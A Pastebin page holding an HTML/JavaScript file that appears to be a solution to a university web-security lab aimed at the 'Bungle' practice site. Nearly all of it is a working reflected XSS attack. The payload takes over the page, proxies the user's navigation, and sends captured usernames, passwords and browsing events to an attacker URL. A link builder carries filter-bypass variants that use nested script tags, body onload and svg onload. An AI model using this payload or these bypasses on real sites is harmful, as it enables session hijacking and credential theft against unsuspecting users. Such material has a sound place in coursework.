API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 29th, 2017
82
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.70 KB | None | 0 0
raw download clone embed print report
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  4. function payload(attacker) {
  5. var target = "http://trurl.cs.illinois.edu/";
  6. function spy_get(spy_url) {
  7. $.ajax({
  8. url: spy_url,
  9. type: "GET",
  10. timeout: 1
  11. });
  12. }
  13.  
  14. function log(data) {
  15. console.log(attacker + "?" + $.param(data));
  16. spy_get(attacker + "?" + $.param(data));
  17. }
  18.  
  19. function log_nav(dest) {
  20. if (getUser() == null) {
  21. log({event: "nav", url: target + dest});
  22. } else {
  23. log({event: "nav", user: getUser(), url: target + dest});
  24. }
  25. }
  26.  
  27. function logLogout() {
  28. log({event: "logout", user: getUser()});
  29. log({event: "nav", url: target});
  30. }
  31.  
  32. function logLogin(username, password) {
  33. log({event: "login", user: username, pass: password});
  34. log({event: "nav", user: username, url: target});
  35. }
  36.  
  37. function logCreateAccount(username, password) {
  38. log({event: "login", user: username, pass: password});
  39. log({event: "nav", user: username, url: target});
  40. }
  41.  
  42. function getUser() {
  43. var username;
  44. if ($("#logged-in-user").length != 0) {
  45. username = $("#logged-in-user").text();
  46. } else {
  47. username = null;
  48. }
  49. return username;
  50. }
  51.  
  52. function proxy(href) {
  53. history.pushState(null, null, href);
  54.  
  55. $(window).on("popstate", function(e) {
  56. e.preventDefault();
  57. proxy("." + location.pathname + window.location.search);
  58. });
  59.  
  60. $("html").load(href, function(){
  61. $("html").show();
  62.  
  63. $("#bungle-lnk, #search-again-btn").click(function(e) {
  64. e.preventDefault();
  65. log_nav("");
  66. proxy("./");
  67. });
  68.  
  69. $("#search-btn").click(function(e) {
  70. e.preventDefault();
  71. var search = $("#query").val();
  72. log_nav("search?q=" + search);
  73. proxy("./search?q=" + search);
  74. });
  75.  
  76. $(".history-item").click(function(e) {
  77. var url = $(this).attr("href");
  78. e.preventDefault();
  79. log_nav(url);
  80. proxy(url);
  81. });
  82.  
  83. $("#log-in-btn").click(function(e) {
  84. e.preventDefault();
  85. var username = $("#username").val();
  86. var userpass = $("#userpass").val();
  87. logLogin(username, userpass);
  88. $.ajax({
  89. type: "POST",
  90. url: "http://trurl.cs.illinois.edu/login",
  91. dataType: "text",
  92. data: {
  93. username: username,
  94. password: userpass
  95. },
  96. success: function() {
  97. proxy("./");
  98. }
  99. });
  100. });
  101.  
  102. $("#new-account-btn").click(function(e) {
  103. e.preventDefault();
  104. var username = $("#username").val();
  105. var userpass = $("#userpass").val();
  106. logCreateAccount(username, userpass);
  107. $.ajax({
  108. type: "POST",
  109. url: "http://trurl.cs.illinois.edu/create",
  110. dataType: "text",
  111. data: {
  112. username: username,
  113. password: userpass
  114. },
  115. success: function() {
  116. logLogin(username, userpass);
  117. $.ajax({
  118. type: "POST",
  119. url: "http://trurl.cs.illinois.edu/login",
  120. dataType: "text",
  121. data: {
  122. username: username,
  123. password: userpass
  124. },
  125. success: function(){
  126. proxy("./");
  127. }
  128. });
  129. }
  130. });
  131. });
  132.  
  133. $("#log-out-btn").click(function(e) {
  134. e.preventDefault();
  135. logLogout();
  136. $.ajax({
  137. type: "POST",
  138. url: "http://trurl.cs.illinois.edu/logout",
  139. success: function(){
  140. proxy("./");
  141. }
  142. });
  143. });
  144. });
  145. }
  146. $("html").hide();
  147. proxy("./");
  148. }
  149.  
  150. function makeLink(xssdefense, target, attacker) {
  151. if (xssdefense == 0) {
  152. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/script>");
  153. } else if (xssdefense == 1) {
  154. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<scrscriptipt" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/scrscriptipt>");
  155. } else if (xssdefense == 2) {
  156. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<body onload='" + payload.toString() + "; payload(\"" + attacker + "\"); '>");
  157. } else if (xssdefense == 3) {
  158. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<svg/onload='" + payload.toString() + "; payload(\"" + attacker + "\"); '>");
  159. } else if (xssdefense == 4) {
  160. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + "><" +"/script>");
  161. }
  162. }
  163.  
  164. var xssdefense = 4;
  165. var target = "http://trurl.cs.illinois.edu/";
  166. var attacker = "http://127.0.0.1:31337/stolen";
  167.  
  168. $(function() {
  169. var url = makeLink(xssdefense, target, attacker);
  170. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
  171. });
  172. </script>
  173.  
  174. <h3></h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!